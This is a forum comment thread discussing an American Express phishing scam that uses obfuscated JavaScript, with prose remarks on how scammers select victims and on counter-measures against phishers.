Obfuscated JavaScript, scam emails, and American Express

porlune · on Feb 3, 2019

I wonder if scammers are intentionally misspelling subject lines because most security savvy people will just delete those as obvious scams and move on. This would have a two pronged effect:

1. it would filter out security savvy individuals from the actual payload, who might report the scam.

2. it would map to the least security conscious individuals who would be the most likely to fall for it.

mef · on Feb 3, 2019

Yes. See "Why Do Nigerian Scammers Say They are From Nigeria?"

https://www.microsoft.com/en-us/research/publication/why-do-...

Waterluvian · on Feb 4, 2019

That page seems like it used a lot of fancy language to say something that could be said in two sentences.

general8bitso · on Feb 4, 2019

What are the two sentences so I don’t have to click the link?

paulbgd · on Feb 4, 2019

Honestly just one:

> By sending an email that repels all but the most gullible the scammer gets the most promising marks to self-select, and tilts the true to false positive ratio in his favor.

bryanrasmussen · on Feb 4, 2019

I wonder about that - is there a bad spot where the obvious scam mail is so obvious that it prompts more people to troll the scammer back?

I mean the people who take the time to troll the scammer back want enjoyment out of it, and the chance of getting that enjoyment would seem to be heightened if the scammer seems more likely to be an idiot.

general8bitso · on Feb 4, 2019

I don’t think the scammer is an idiot, but I only have so much time in the day for vigilantism.

I did get an IRS scam VOIP number shutdown last week in about 15 minutes.

userbinator · on Feb 4, 2019

The next logical step after finding where the data is sent, is to use a script to fill the phisher's database with rubbish... there are sites like https://www.fakenamegenerator.com/ which will help you create fake-yet-plausible identities.

I remember many years ago I was sent a keylogger. I reversed it, found it was configured to upload keylogs to an FTP server on a free webhost, and promptly replaced the existing contents of it with as many copies of The Bible as would fit in the few MB of space available.

pciexpgpu · on Feb 4, 2019

Is it ethical or possible to attack the attacker by spawning a few cloud instances that POST dummy but nearly legit responses to their website? This way they would have to comb through and hopefully verify a lot of crap to find victims' card numbers?

Unless of course they were clever enough to embed some fake cookie to track responses to specific emails...

chinhodado · on Feb 3, 2019

So in the end, what does the obfuscated JS do?

jonluca · on Feb 3, 2019

It's a triple encoded payload that loads in a large HTML blob onto the page. The payload is 99% similar to Amex's actual page, it just submits the data to the attackers domain, and has a few extra fields like mothers maiden name, elementary school, etc.

The purpose of the obfuscation is 1) to prevent automated scanners and 2) prevent debugging of the script.

Since we did static analysis it did not impact the result.

romanov89 · on Feb 4, 2019

I guess the few extra fields, gets them the possible security question answers for account takeovers

benj111 · on Feb 4, 2019

And yet, if you turn off JavaScript to protect against this type of thing, you end up breaking most financial websites.

(American Express is in fairness the one site that continued working ok as I recall)

me45555 · on Feb 5, 2019

Very interesting, thanks for the post